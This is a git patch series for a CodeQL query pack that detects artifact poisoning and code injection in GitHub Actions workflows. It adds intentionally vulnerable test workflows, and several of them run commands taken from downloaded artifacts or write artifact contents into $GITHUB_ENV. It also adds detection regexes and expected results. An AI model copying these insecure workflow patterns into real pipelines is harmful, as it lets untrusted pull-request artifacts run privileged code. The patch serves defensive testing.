-10,10 +10,14 @@ jobs: Download: runs-on: ubuntu-latest steps: - - run: | - gh run download "${WORKFLOW_RUN_ID}" --repo "${GITHUB_REPOSITORY}" --name "artifact_name" + - uses: dawidd6/action-download-artifact@v2 + with: + name: artifact_name + workflow: wf.yml + path: foo - name: Run command - run: cmd + run: | + ./foo/cmd diff --git a/ql/test/query-tests/Security/CWE-829/.github/workflows/artifactpoisoning2.yml b/ql/test/query-tests/Security/CWE-829/.github/workflows/artifactpoisoning22.yml similarity index 94% rename from ql/test/query-tests/Security/CWE-829/.github/workflows/artifactpoisoning2.yml rename to ql/test/query-tests/Security/CWE-829/.github/workflows/artifactpoisoning22.yml index 725038ab8165..31fa30175512 100644 --- a/ql/test/query-tests/Security/CWE-829/.github/workflows/artifactpoisoning2.yml +++ b/ql/test/query-tests/Security/CWE-829/.github/workflows/artifactpoisoning22.yml @@ -15,7 +15,7 @@ jobs: name: artifact_name workflow: wf.yml - name: Run command - run: cmd + run: ./cmd diff --git a/ql/test/query-tests/Security/CWE-829/.github/workflows/artifactpoisoning31.yml b/ql/test/query-tests/Security/CWE-829/.github/workflows/artifactpoisoning31.yml new file mode 100644 index 000000000000..0e7c6f97cf5d --- /dev/null +++ b/ql/test/query-tests/Security/CWE-829/.github/workflows/artifactpoisoning31.yml @@ -0,0 +1,22 @@ +name: Pull Request Open + +on: + workflow_run: + workflows: ["Prev"] + types: + - completed + +jobs: + Download: + runs-on: ubuntu-latest + steps: + - run: | + gh run download "${{github.event.workflow_run.id}}" --repo "${GITHUB_REPOSITORY}" --name "artifact_name" + - name: Unzip + run: | + unzip artifact_name.zip -d foo + - name: Run command + run: ./foo/cmd + + + diff --git a/ql/test/query-tests/Security/CWE-829/.github/workflows/artifactpoisoning32.yml b/ql/test/query-tests/Security/CWE-829/.github/workflows/artifactpoisoning32.yml new file mode 100644 index 000000000000..7a837ee42d2c --- /dev/null +++ b/ql/test/query-tests/Security/CWE-829/.github/workflows/artifactpoisoning32.yml @@ -0,0 +1,21 @@ +name: Pull Request Open + +on: + workflow_run: + workflows: ["Prev"] + types: + - completed + +jobs: + Download: + runs-on: ubuntu-latest + steps: + - run: | + gh run download "${{github.event.workflow_run.id}}" --repo "${GITHUB_REPOSITORY}" --name "artifact_name" --dir foo + unzip artifact_name.zip -d bar + - name: Run command + run: | + ./bar/cmd + + + diff --git a/ql/test/query-tests/Security/CWE-829/.github/workflows/artifactpoisoning33.yml b/ql/test/query-tests/Security/CWE-829/.github/workflows/artifactpoisoning33.yml new file mode 100644 index 000000000000..39ec063c7b64 --- /dev/null +++ b/ql/test/query-tests/Security/CWE-829/.github/workflows/artifactpoisoning33.yml @@ -0,0 +1,21 @@ +name: Pull Request Open + +on: + workflow_run: + workflows: ["Prev"] + types: + - completed + +jobs: + Download: + runs-on: ubuntu-latest + steps: + - run: | + gh run download "${{github.event.workflow_run.id}}" --repo "${GITHUB_REPOSITORY}" --name "artifact_name" --dir foo + unzip foo/artifact_name.zip + - name: Run command + run: | + ./bar/cmd + + + diff --git a/ql/test/query-tests/Security/CWE-829/.github/workflows/artifactpoisoning41.yml b/ql/test/query-tests/Security/CWE-829/.github/workflows/artifactpoisoning41.yml new file mode 100644 index 000000000000..afa3e15132e3 --- /dev/null +++ b/ql/test/query-tests/Security/CWE-829/.github/workflows/artifactpoisoning41.yml @@ -0,0 +1,25 @@ +name: Pull Request Open + +on: + workflow_run: + workflows: ["Prev"] + types: + - completed + +jobs: + Download: + runs-on: ubuntu-latest + steps: + - run: | + artifacts_url=${{ github.event.workflow_run.artifacts_url }} + gh api "$artifacts_url" -q '.artifacts[] | [.name, .archive_download_url] | @tsv' | while read artifact + do + IFS=$'\t' read name url <<< "$artifact" + gh api $url > "$name.zip" + unzip -d "foo" "$name.zip" + done + - name: Run command + run: ./foo/cmd + + + diff --git a/ql/test/query-tests/Security/CWE-829/.github/workflows/artifactpoisoning4.yml b/ql/test/query-tests/Security/CWE-829/.github/workflows/artifactpoisoning42.yml similarity index 89% rename from ql/test/query-tests/Security/CWE-829/.github/workflows/artifactpoisoning4.yml rename to ql/test/query-tests/Security/CWE-829/.github/workflows/artifactpoisoning42.yml index 26d342f7060c..d3100d46edc7 100644 --- a/ql/test/query-tests/Security/CWE-829/.github/workflows/artifactpoisoning4.yml +++ b/ql/test/query-tests/Security/CWE-829/.github/workflows/artifactpoisoning42.yml @@ -16,10 +16,10 @@ jobs: do IFS=$'\t' read name url <<< "$artifact" gh api $url > "$name.zip" - unzip -d "$name" "$name.zip" + unzip "$name.zip" done - name: Run command - run: cmd + run: ./cmd diff --git a/ql/test/query-tests/Security/CWE-829/.github/workflows/artifactpoisoning51.yml b/ql/test/query-tests/Security/CWE-829/.github/workflows/artifactpoisoning51.yml new file mode 100644 index 000000000000..ca074428ccfa --- /dev/null +++ b/ql/test/query-tests/Security/CWE-829/.github/workflows/artifactpoisoning51.yml @@ -0,0 +1,24 @@ +name: Pull Request Open + +on: + workflow_run: + workflows: ["Prev"] + types: + - completed + +jobs: + Download: + runs-on: ubuntu-latest + steps: + - run: | + gh run download "${{github.event.workflow_run.id}}" --repo "${GITHUB_REPOSITORY}" --name "artifact_name" + - name: Unzip + run: | + unzip artifact_name.zip -d foo + - name: Env Var Injection + run: | + echo "pr_number=$(cat foo/bar)" >> $GITHUB_ENV + + + + diff --git a/ql/test/query-tests/Security/CWE-829/ArtifactPoisoning.expected b/ql/test/query-tests/Security/CWE-829/ArtifactPoisoning.expected index 8113215481c1..907979b88e7c 100644 --- a/ql/test/query-tests/Security/CWE-829/ArtifactPoisoning.expected +++ b/ql/test/query-tests/Security/CWE-829/ArtifactPoisoning.expected @@ -1,4 +1,10 @@ -| .github/workflows/artifactpoisoning1.yml:13:9:30:6 | Uses Step | Potential artifact poisoning. | -| .github/workflows/artifactpoisoning2.yml:13:9:17:6 | Uses Step | Potential artifact poisoning. | -| .github/workflows/artifactpoisoning3.yml:13:9:15:6 | Run Step | Potential artifact poisoning. | -| .github/workflows/artifactpoisoning4.yml:13:9:21:6 | Run Step | Potential artifact poisoning. | +| .github/workflows/artifactpoisoning11.yml:13:9:32:6 | Uses Step | Potential artifact poisoning. | +| .github/workflows/artifactpoisoning12.yml:13:9:32:6 | Uses Step | Potential artifact poisoning. | +| .github/workflows/artifactpoisoning21.yml:13:9:18:6 | Uses Step | Potential artifact poisoning. | +| .github/workflows/artifactpoisoning22.yml:13:9:17:6 | Uses Step | Potential artifact poisoning. | +| .github/workflows/artifactpoisoning31.yml:13:9:15:6 | Run Step | Potential artifact poisoning. | +| .github/workflows/artifactpoisoning32.yml:13:9:16:6 | Run Step | Potential artifact poisoning. | +| .github/workflows/artifactpoisoning33.yml:13:9:16:6 | Run Step | Potential artifact poisoning. | +| .github/workflows/artifactpoisoning41.yml:13:9:21:6 | Run Step | Potential artifact poisoning. | +| .github/workflows/artifactpoisoning42.yml:13:9:21:6 | Run Step | Potential artifact poisoning. | +| .github/workflows/artifactpoisoning51.yml:13:9:15:6 | Run Step | Potential artifact poisoning. | diff --git a/ql/test/query-tests/Security/CWE-829/UnpinnedActionsTag.expected b/ql/test/query-tests/Security/CWE-829/UnpinnedActionsTag.expected index 5a572edf423f..7bee36029d6b 100644 --- a/ql/test/query-tests/Security/CWE-829/UnpinnedActionsTag.expected +++ b/ql/test/query-tests/Security/CWE-829/UnpinnedActionsTag.expected @@ -1,6 +1,7 @@ | .github/workflows/actor_trusted_checkout.yml:19:7:23:4 | Uses Step | Unpinned 3rd party Action 'actor_trusted_checkout.yml' step $@ uses 'completely/fakeaction' with ref 'v2', not a pinned commit hash | .github/workflows/actor_trusted_checkout.yml:19:7:23:4 | Uses Step | Uses Step | | .github/workflows/actor_trusted_checkout.yml:23:7:26:21 | Uses Step | Unpinned 3rd party Action 'actor_trusted_checkout.yml' step $@ uses 'fakerepo/comment-on-pr' with ref 'v1', not a pinned commit hash | .github/workflows/actor_trusted_checkout.yml:23:7:26:21 | Uses Step | Uses Step | -| .github/workflows/artifactpoisoning2.yml:13:9:17:6 | Uses Step | Unpinned 3rd party Action 'Pull Request Open' step $@ uses 'dawidd6/action-download-artifact' with ref 'v2', not a pinned commit hash | .github/workflows/artifactpoisoning2.yml:13:9:17:6 | Uses Step | Uses Step | +| .github/workflows/artifactpoisoning21.yml:13:9:18:6 | Uses Step | Unpinned 3rd party Action 'Pull Request Open' step $@ uses 'dawidd6/action-download-artifact' with ref 'v2', not a pinned commit hash | .github/workflows/artifactpoisoning21.yml:13:9:18:6 | Uses Step | Uses Step | +| .github/workflows/artifactpoisoning22.yml:13:9:17:6 | Uses Step | Unpinned 3rd party Action 'Pull Request Open' step $@ uses 'dawidd6/action-download-artifact' with ref 'v2', not a pinned commit hash | .github/workflows/artifactpoisoning22.yml:13:9:17:6 | Uses Step | Uses Step | | .github/workflows/auto_ci.yml:93:9:96:6 | Uses Step | Unpinned 3rd party Action 'Python CI' step $@ uses 'codecov/codecov-action' with ref 'v3', not a pinned commit hash | .github/workflows/auto_ci.yml:93:9:96:6 | Uses Step | Uses Step | | .github/workflows/auto_ci.yml:108:9:119:6 | Uses Step: create_pr | Unpinned 3rd party Action 'Python CI' step $@ uses 'peter-evans/create-pull-request' with ref 'v5', not a pinned commit hash | .github/workflows/auto_ci.yml:108:9:119:6 | Uses Step: create_pr | Uses Step: create_pr | | .github/workflows/auto_ci.yml:125:9:133:6 | Uses Step | Unpinned 3rd party Action 'Python CI' step $@ uses 'thollander/actions-comment-pull-request' with ref 'v2', not a pinned commit hash | .github/workflows/auto_ci.yml:125:9:133:6 | Uses Step | Uses Step | From 3209378f453a2ad58038e8d74b77747d344f5013 Mon Sep 17 00:00:00 2001 From: =?UTF-8?q?Alvaro=20Mu=C3=B1oz?= Date: Fri, 5 Apr 2024 14:25:25 +0200 Subject: [PATCH 149/707] Remove TODO --- ql/lib/codeql/actions/security/ArtifactPoisoningQuery.qll | 1 - 1 file changed, 1 deletion(-) diff --git a/ql/lib/codeql/actions/security/ArtifactPoisoningQuery.qll b/ql/lib/codeql/actions/security/ArtifactPoisoningQuery.qll index c64a7d0e3383..8094235292a0 100644 --- a/ql/lib/codeql/actions/security/ArtifactPoisoningQuery.qll +++ b/ql/lib/codeql/actions/security/ArtifactPoisoningQuery.qll @@ -196,4 +196,3 @@ class EnvVarInjectionRunStep extends PoisonableStep, Run { ) } } -// TODO: Taint Step for output var definition based on file content. eg: `echo "sha=$(cat test-results/sha-number)" >> $GITHUB_OUTPUT` From 2651e5a673137a923cd744dd69dc3d8e937d46e5 Mon Sep 17 00:00:00 2001 From: =?UTF-8?q?Alvaro=20Mu=C3=B1oz?= Date: Mon, 8 Apr 2024 12:52:10 +0200 Subject: [PATCH 150/707] Improve Artifact poisoning related queries --- ql/lib/codeql/actions/Ast.qll | 53 +++++++++++ .../codeql/actions/dataflow/FlowSources.qll | 10 ++ ql/lib/codeql/actions/dataflow/FlowSteps.qll | 23 ++++- .../dataflow/internal/DataFlowPrivate.qll | 6 +- .../security/ArtifactPoisoningQuery.qll | 94 +++++++++++++++---- ql/lib/ext/marocchino_on_artifact.model.yml | 6 ++ ...bers-in-action_download-artifact.model.yml | 7 ++ ql/test/library-tests/test.expected | 16 ++++ ql/test/library-tests/test.ql | 29 ++++++ .../.github/workflows/artifactpoisoning1.yml | 89 ++++++++++++++++++ .../.github/workflows/artifactpoisoning2.yml | 23 +++++ .../Security/CWE-094/CodeInjection.expected | 8 ++ .../CWE-094/PrivilegedCodeInjection.expected | 10 ++ 13 files changed, 350 insertions(+), 24 deletions(-) create mode 100644 ql/lib/ext/marocchino_on_artifact.model.yml create mode 100644 ql/lib/ext/redhat-plumbers-in-action_download-artifact.model.yml create mode 100644 ql/test/query-tests/Security/CWE-094/.github/workflows/artifactpoisoning1.yml create mode 100644 ql/test/query-tests/Security/CWE-094/.github/workflows/artifactpoisoning2.yml diff --git a/ql/lib/codeql/actions/Ast.qll b/ql/lib/codeql/actions/Ast.qll index 720fd29feb0f..a9fe35259c5c 100644 --- a/ql/lib/codeql/actions/Ast.qll +++ b/ql/lib/codeql/actions/Ast.qll @@ -18,6 +18,59 @@ module Utils { "toJSON\\(\\s*" + regex + "\\s*\\)" ] } + + bindingset[line, var] + predicate extractAssignment(string line, string var, string key, string value) { + exists(string assignment | + ( + assignment = + line.regexpCapture("(echo|Write-Output)\\s+\"(.*)\"\\s*>>\\s*(\"|')?\\$GITHUB_" + + var.toUpperCase() + "(\"|')?", 2) + .regexpReplaceAll("^\"", "") + .regexpReplaceAll("\"$", "") or + assignment = + line.regexpCapture("(echo|Write-Output)\\s+'(.*)'\\s*>>\\s*(\"|')?\\$GITHUB_" + + var.toUpperCase() + "(\"|')?", 2) + .regexpReplaceAll("^'", "") + .regexpReplaceAll("'$", "") or + assignment = + line.regexpCapture("(echo|Write-Output)\\s+([^'\"]*)\\s*>>\\s*(\"|')?\\$GITHUB_" + + var.toUpperCase() + "(\"|')?", 2) + ) and + key = assignment.splitAt("=", 0).trim() and + value = assignment.splitAt("=", 1).trim() + or + ( + assignment = + line.regexpCapture("(echo|Write-Output)\\s+\"::set-" + var.toLowerCase() + + "\\s+name=(.*)\"", 2).regexpReplaceAll("^\"", "").regexpReplaceAll("\"$", "") or + assignment = + line.regexpCapture("(echo|Write-Output)\\s+'::set-" + var.toLowerCase() + "\\s+name=(.*)'", + 2).regexpReplaceAll("^'", "").regexpReplaceAll("'$", "") or + assignment = + line.regexpCapture("(echo|Write-Output)\\s+::set-" + var.toLowerCase() + "\\s+name=(.*)", + 2) + ) and + key = assignment.splitAt("::", 0).trim() and + value = assignment.splitAt("::", 1).trim() + ) + } + + predicate writeToGitHubEnv(Run run, string key, string value) { + exists(string script, string line | + script = run.getScript() and + line = script.splitAt("\n") and + Utils::extractAssignment(line, "ENV", key, value) + ) + } + + predicate writeToGitHubOutput(Run run, string key, string value) { + exists(string script, string line | + script = run.getScript() and + line = script.splitAt("\n") and + Utils::extractAssignment(line, "OUTPUT", key, value) + ) + } } class AstNode instanceof AstNodeImpl { diff --git a/ql/lib/codeql/actions/dataflow/FlowSources.qll b/ql/lib/codeql/actions/dataflow/FlowSources.qll index 699b5f6f6c3c..c0e0e759120f 100644 --- a/ql/lib/codeql/actions/dataflow/FlowSources.qll +++ b/ql/lib/codeql/actions/dataflow/FlowSources.qll @@ -2,6 +2,7 @@ private import actions private import codeql.actions.DataFlow private import codeql.actions.dataflow.ExternalFlow private import codeql.actions.Ast::Utils as Utils +private import codeql.actions.security.ArtifactPoisoningQuery /** * A data flow source. @@ -157,3 +158,12 @@ private class CompositeActionInputSource extends RemoteFlowSource { override string getSourceType() { result = "Composite action input" } } + +/** + * A downloadeded artifact. + */ +private class ArtifactToOptionSource extends RemoteFlowSource { + ArtifactToOptionSource() { this.asExpr() instanceof ArtifactDownloadStep } + + override string getSourceType() { result = "Step output from Artifact" } +} diff --git a/ql/lib/codeql/actions/dataflow/FlowSteps.qll b/ql/lib/codeql/actions/dataflow/FlowSteps.qll index 343578168127..242cbcf9a31a 100644 --- a/ql/lib/codeql/actions/dataflow/FlowSteps.qll +++ b/ql/lib/codeql/actions/dataflow/FlowSteps.qll @@ -6,6 +6,8 @@ private import actions private import codeql.util.Unit private import codeql.actions.DataFlow private import codeql.actions.dataflow.ExternalFlow +private import codeql.actions.Ast::Utils as Utils +private import codeql.actions.security.ArtifactPoisoningQuery /** * A unit class for adding additional taint steps. @@ -40,12 +42,25 @@ predicate envToOutputStoreStep(DataFlow::Node pred, DataFlow::Node succ, DataFlo exists(string script, string line | script = run.getScript() and line = script.splitAt("\n") and - ( - output = line.regexpCapture(".*::set-output\\s+name=(.*)::.*", 1) or - output = line.regexpCapture(".*echo\\s*\"(.*)=.*\\s*>>\\s*(\")?\\$GITHUB_OUTPUT.*", 1) - ) and + Utils::extractAssignment(line, "OUTPUT", output, _) and line.indexOf("$" + ["", "{", "ENV{"] + varName) > 0 ) and succ.asExpr() = run ) } + +/** + * A downloaded artifact that gets assigned to a Run step output. + * - uses: actions/download-artifact@v2 + * - run: echo "::set-output name=id::$(>\\s*\\$GITHUB_ENV", 2) and - value = line.regexpCapture("echo\\s+(\")?([^=]+)\\s*=(.*)(\")?\\s*>>\\s*\\$GITHUB_ENV", 3) - ) -} - class EnvVarInjectionRunStep extends PoisonableStep, Run { EnvVarInjectionRunStep() { exists(ArtifactDownloadStep step, string value | @@ -191,8 +247,10 @@ class EnvVarInjectionRunStep extends PoisonableStep, Run { // Heuristic: // Run step with env var definition based on file content. // eg: `echo "sha=$(cat test-results/sha-number)" >> $GITHUB_ENV` - writeToGithubEnv(this, _, value) and - value.regexpMatch(".*cat\\s+.*") + // eg: `echo "sha=$(> $GITHUB_ENV` + Utils::writeToGitHubEnv(this, _, value) and + // TODO: add support for other commands like `<`, `jq`, ... + value.regexpMatch(["\\$\\(", "`"] + ["cat\\s+", "<"] + ".*" + ["`", "\\)"]) ) } } diff --git a/ql/lib/ext/marocchino_on_artifact.model.yml b/ql/lib/ext/marocchino_on_artifact.model.yml new file mode 100644 index 000000000000..9f621758cffb --- /dev/null +++ b/ql/lib/ext/marocchino_on_artifact.model.yml @@ -0,0 +1,6 @@ +extensions: + - addsTo: + pack: githubsecuritylab/actions-all + extensible: sourceModel + data: + - ["marocchino/on_artifact", "*", "output.*", "Downloaded artifact"] diff --git a/ql/lib/ext/redhat-plumbers-in-action_download-artifact.model.yml b/ql/lib/ext/redhat-plumbers-in-action_download-artifact.model.yml new file mode 100644 index 000000000000..52c478dd1d4d --- /dev/null +++ b/ql/lib/ext/redhat-plumbers-in-action_download-artifact.model.yml @@ -0,0 +1,7 @@ +extensions: + - addsTo: + pack: githubsecuritylab/actions-all + extensible: sourceModel + data: + - ["redhat-plumbers-in-action/download-artifact", "*", "output.*", "Downloaded artifact"] + diff --git a/ql/test/library-tests/test.expected b/ql/test/library-tests/test.expected index ea353609e249..8b5f3e7184ba 100644 --- a/ql/test/library-tests/test.expected +++ b/ql/test/library-tests/test.expected @@ -329,7 +329,9 @@ sources | jitterbit/get-changed-files | * | output.removed | PR changed files | | jitterbit/get-changed-files | * | output.renamed | PR changed files | | khan/pull-request-comment-trigger | * | output.comment_body | Comment body | +| marocchino/on_artifact | * | output.* | Downloaded artifact | | octo-org/source-repo/.github/workflows/workflow.yml | * | output.workflow-output | Foo | +| redhat-plumbers-in-action/download-artifact | * | output.* | Downloaded artifact | | tj-actions/branch-names | * | output.current_branch | PR current branch | | tj-actions/branch-names | * | output.head_ref_branch | PR head branch | | tj-actions/branch-names | * | output.ref_branch | Branch tirggering workflow run | @@ -425,3 +427,17 @@ testNormalizeExpr | github.event.pull_request.user["login"] | github.event.pull_request.user.login | | github.event.pull_request.user['login'] | github.event.pull_request.user.login | | github.event.pull_request['user']['login'] | github.event.pull_request.user.login | +writeToGitHubEnv +| id1 | $(> $GITHUB_ENV", + "echo 'sha2=$(> $GITHUB_ENV", + "echo sha3=$(> $GITHUB_ENV", + ] and + Utils::extractAssignment(t, "ENV", key, value) + ) +} + +query predicate writeToGitHubOutput(string key, string value) { + exists(string t | + t = + [ + "echo \"::set-output name=id1::$(> $GITHUB_OUTPUT", + "echo 'sha2=$(> $GITHUB_OUTPUT", + "echo sha3=$(> $GITHUB_OUTPUT", + ] and + Utils::extractAssignment(t, "OUTPUT", key, value) + ) +} diff --git a/ql/test/query-tests/Security/CWE-094/.github/workflows/artifactpoisoning1.yml b/ql/test/query-tests/Security/CWE-094/.github/workflows/artifactpoisoning1.yml new file mode 100644 index 000000000000..8475711949f8 --- /dev/null +++ b/ql/test/query-tests/Security/CWE-094/.github/workflows/artifactpoisoning1.yml @@ -0,0 +1,89 @@ +name: Preview Deploy + +on: + workflow_run: + workflows: ["Preview Build"] + types: + - completed + +jobs: + success: + runs-on: ubuntu-latest + if: github.event.workflow_run.event == 'pull_request' && github.event.workflow_run.conclusion == 'success' + steps: + - name: download pr artifact + uses: dawidd6/action-download-artifact@v2 + with: + workflow: ${{ github.event.workflow_run.workflow_id }} + name: pr + + - name: save PR id + id: pr + run: echo "::set-output name=id::$( + + + body-include: '' + number: ${{ steps.pr.outputs.id }} + + - name: The job failed + if: ${{ failure() }} + uses: actions-cool/maintain-one-comment@v1.2.1 + with: + token: ${{ secrets.GITHUB_TOKEN }} + body: | + 😭 Deploy PR Preview failed. + + + + + body-include: '' + number: ${{ steps.pr.outputs.id }} + + failed: + runs-on: ubuntu-latest + if: github.event.workflow_run.event == 'pull_request' && github.event.workflow_run.conclusion == 'failure' + steps: + - name: download pr artifact + uses: dawidd6/action-download-artifact@v2 + with: + workflow: ${{ github.event.workflow_run.workflow_id }} + name: pr + + - name: save PR id + id: pr + run: echo "::set-output name=id::$( + + + body-include: '' + number: ${{ steps.pr.outputs.id }} diff --git a/ql/test/query-tests/Security/CWE-094/.github/workflows/artifactpoisoning2.yml b/ql/test/query-tests/Security/CWE-094/.github/workflows/artifactpoisoning2.yml new file mode 100644 index 000000000000..f8d80cc798e1 --- /dev/null +++ b/ql/test/query-tests/Security/CWE-094/.github/workflows/artifactpoisoning2.yml @@ -0,0 +1,23 @@ +name: Preview Deploy + +on: + workflow_run: + workflows: ["Preview Build"] + types: + - completed + +jobs: + success: + runs-on: ubuntu-latest + steps: + - id: pr + name: Download Artifact + uses: redhat-plumbers-in-action/download-artifact@main + with: + name: README + + - name: upload surge service + id: deploy + run: | + echo ${{ steps.pr.outputs.id }} + diff --git a/ql/test/query-tests/Security/CWE-094/CodeInjection.expected b/ql/test/query-tests/Security/CWE-094/CodeInjection.expected index 6cb2c1ed3992..d2e188ead67f 100644 --- a/ql/test/query-tests/Security/CWE-094/CodeInjection.expected +++ b/ql/test/query-tests/Security/CWE-094/CodeInjection.expected @@ -2,6 +2,9 @@ edges | .github/workflows/argus_case_study.yml:15:9:24:6 | Uses Step: remove_quotations [replaced] | .github/workflows/argus_case_study.yml:27:33:27:77 | steps.remove_quotations.outputs.replaced | | .github/workflows/argus_case_study.yml:17:25:17:53 | github.event.issue.title | .github/workflows/argus_case_study.yml:22:20:22:39 | env.ISSUE_TITLE | | .github/workflows/argus_case_study.yml:22:20:22:39 | env.ISSUE_TITLE | .github/workflows/argus_case_study.yml:15:9:24:6 | Uses Step: remove_quotations [replaced] | +| .github/workflows/artifactpoisoning1.yml:14:9:20:6 | Uses Step | .github/workflows/artifactpoisoning1.yml:20:9:24:6 | Run Step: pr [id] | +| .github/workflows/artifactpoisoning1.yml:20:9:24:6 | Run Step: pr [id] | .github/workflows/artifactpoisoning1.yml:34:67:34:92 | steps.pr.outputs.id | +| .github/workflows/artifactpoisoning2.yml:13:9:19:6 | Uses Step: pr | .github/workflows/artifactpoisoning2.yml:22:17:22:42 | steps.pr.outputs.id | | .github/workflows/changed-files.yml:16:9:20:6 | Uses Step: changed-files | .github/workflows/changed-files.yml:22:24:22:75 | steps.changed-files.outputs.all_changed_files | | .github/workflows/changelog.yml:49:19:49:56 | github.event.pull_request.title | .github/workflows/changelog.yml:58:26:58:39 | env.log | | .github/workflows/changelog_from_prt.yml:49:19:49:56 | github.event.pull_request.title | .github/workflows/changelog_from_prt.yml:58:26:58:39 | env.log | @@ -64,6 +67,11 @@ nodes | .github/workflows/argus_case_study.yml:17:25:17:53 | github.event.issue.title | semmle.label | github.event.issue.title | | .github/workflows/argus_case_study.yml:22:20:22:39 | env.ISSUE_TITLE | semmle.label | env.ISSUE_TITLE | | .github/workflows/argus_case_study.yml:27:33:27:77 | steps.remove_quotations.outputs.replaced | semmle.label | steps.remove_quotations.outputs.replaced | +| .github/workflows/artifactpoisoning1.yml:14:9:20:6 | Uses Step | semmle.label | Uses Step | +| .github/workflows/artifactpoisoning1.yml:20:9:24:6 | Run Step: pr [id] | semmle.label | Run Step: pr [id] | +| .github/workflows/artifactpoisoning1.yml:34:67:34:92 | steps.pr.outputs.id | semmle.label | steps.pr.outputs.id | +| .github/workflows/artifactpoisoning2.yml:13:9:19:6 | Uses Step: pr | semmle.label | Uses Step: pr | +| .github/workflows/artifactpoisoning2.yml:22:17:22:42 | steps.pr.outputs.id | semmle.label | steps.pr.outputs.id | | .github/workflows/changed-files.yml:16:9:20:6 | Uses Step: changed-files | semmle.label | Uses Step: changed-files | | .github/workflows/changed-files.yml:22:24:22:75 | steps.changed-files.outputs.all_changed_files | semmle.label | steps.changed-files.outputs.all_changed_files | | .github/workflows/changelog.yml:49:19:49:56 | github.event.pull_request.title | semmle.label | github.event.pull_request.title | diff --git a/ql/test/query-tests/Security/CWE-094/PrivilegedCodeInjection.expected b/ql/test/query-tests/Security/CWE-094/PrivilegedCodeInjection.expected index 25441104064a..bc1fd8709507 100644 --- a/ql/test/query-tests/Security/CWE-094/PrivilegedCodeInjection.expected +++ b/ql/test/query-tests/Security/CWE-094/PrivilegedCodeInjection.expected @@ -2,6 +2,9 @@ edges | .github/workflows/argus_case_study.yml:15:9:24:6 | Uses Step: remove_quotations [replaced] | .github/workflows/argus_case_study.yml:27:33:27:77 | steps.remove_quotations.outputs.replaced | | .github/workflows/argus_case_study.yml:17:25:17:53 | github.event.issue.title | .github/workflows/argus_case_study.yml:22:20:22:39 | env.ISSUE_TITLE | | .github/workflows/argus_case_study.yml:22:20:22:39 | env.ISSUE_TITLE | .github/workflows/argus_case_study.yml:15:9:24:6 | Uses Step: remove_quotations [replaced] | +| .github/workflows/artifactpoisoning1.yml:14:9:20:6 | Uses Step | .github/workflows/artifactpoisoning1.yml:20:9:24:6 | Run Step: pr [id] | +| .github/workflows/artifactpoisoning1.yml:20:9:24:6 | Run Step: pr [id] | .github/workflows/artifactpoisoning1.yml:34:67:34:92 | steps.pr.outputs.id | +| .github/workflows/artifactpoisoning2.yml:13:9:19:6 | Uses Step: pr | .github/workflows/artifactpoisoning2.yml:22:17:22:42 | steps.pr.outputs.id | | .github/workflows/changed-files.yml:16:9:20:6 | Uses Step: changed-files | .github/workflows/changed-files.yml:22:24:22:75 | steps.changed-files.outputs.all_changed_files | | .github/workflows/changelog.yml:49:19:49:56 | github.event.pull_request.title | .github/workflows/changelog.yml:58:26:58:39 | env.log | | .github/workflows/changelog_from_prt.yml:49:19:49:56 | github.event.pull_request.title | .github/workflows/changelog_from_prt.yml:58:26:58:39 | env.log | @@ -64,6 +67,11 @@ nodes | .github/workflows/argus_case_study.yml:17:25:17:53 | github.event.issue.title | semmle.label | github.event.issue.title | | .github/workflows/argus_case_study.yml:22:20:22:39 | env.ISSUE_TITLE | semmle.label | env.ISSUE_TITLE | | .github/workflows/argus_case_study.yml:27:33:27:77 | steps.remove_quotations.outputs.replaced | semmle.label | steps.remove_quotations.outputs.replaced | +| .github/workflows/artifactpoisoning1.yml:14:9:20:6 | Uses Step | semmle.label | Uses Step | +| .github/workflows/artifactpoisoning1.yml:20:9:24:6 | Run Step: pr [id] | semmle.label | Run Step: pr [id] | +| .github/workflows/artifactpoisoning1.yml:34:67:34:92 | steps.pr.outputs.id | semmle.label | steps.pr.outputs.id | +| .github/workflows/artifactpoisoning2.yml:13:9:19:6 | Uses Step: pr | semmle.label | Uses Step: pr | +| .github/workflows/artifactpoisoning2.yml:22:17:22:42 | steps.pr.outputs.id | semmle.label | steps.pr.outputs.id | | .github/workflows/changed-files.yml:16:9:20:6 | Uses Step: changed-files | semmle.label | Uses Step: changed-files | | .github/workflows/changed-files.yml:22:24:22:75 | steps.changed-files.outputs.all_changed_files | semmle.label | steps.changed-files.outputs.all_changed_files | | .github/workflows/changelog.yml:49:19:49:56 | github.event.pull_request.title | semmle.label | github.event.pull_request.title | @@ -210,6 +218,8 @@ nodes subpaths #select | .github/workflows/argus_case_study.yml:27:33:27:77 | steps.remove_quotations.outputs.replaced | .github/workflows/argus_case_study.yml:17:25:17:53 | github.event.issue.title | .github/workflows/argus_case_study.yml:27:33:27:77 | steps.remove_quotations.outputs.replaced | Potential privileged code injection in $@, which may be controlled by an external user. | .github/workflows/argus_case_study.yml:27:33:27:77 | steps.remove_quotations.outputs.replaced | ${{steps.remove_quotations.outputs.replaced}} | +| .github/workflows/artifactpoisoning1.yml:34:67:34:92 | steps.pr.outputs.id | .github/workflows/artifactpoisoning1.yml:14:9:20:6 | Uses Step | .github/workflows/artifactpoisoning1.yml:34:67:34:92 | steps.pr.outputs.id | Potential privileged code injection in $@, which may be controlled by an external user. | .github/workflows/artifactpoisoning1.yml:34:67:34:92 | steps.pr.outputs.id | ${{ steps.pr.outputs.id }} | +| .github/workflows/artifactpoisoning2.yml:22:17:22:42 | steps.pr.outputs.id | .github/workflows/artifactpoisoning2.yml:13:9:19:6 | Uses Step: pr | .github/workflows/artifactpoisoning2.yml:22:17:22:42 | steps.pr.outputs.id | Potential privileged code injection in $@, which may be controlled by an external user. | .github/workflows/artifactpoisoning2.yml:22:17:22:42 | steps.pr.outputs.id | ${{ steps.pr.outputs.id }} | | .github/workflows/changelog.yml:58:26:58:39 | env.log | .github/workflows/changelog.yml:49:19:49:56 | github.event.pull_request.title | .github/workflows/changelog.yml:58:26:58:39 | env.log | Potential privileged code injection in $@, which may be controlled by an external user. | .github/workflows/changelog.yml:58:26:58:39 | env.log | ${{ env.log }} | | .github/workflows/changelog_from_prt.yml:58:26:58:39 | env.log | .github/workflows/changelog_from_prt.yml:49:19:49:56 | github.event.pull_request.title | .github/workflows/changelog_from_prt.yml:58:26:58:39 | env.log | Potential privileged code injection in $@, which may be controlled by an external user. | .github/workflows/changelog_from_prt.yml:58:26:58:39 | env.log | ${{ env.log }} | | .github/workflows/comment_issue.yml:9:15:9:46 | github.event.comment.body | .github/workflows/comment_issue.yml:9:15:9:46 | github.event.comment.body | .github/workflows/comment_issue.yml:9:15:9:46 | github.event.comment.body | Potential privileged code injection in $@, which may be controlled by an external user. | 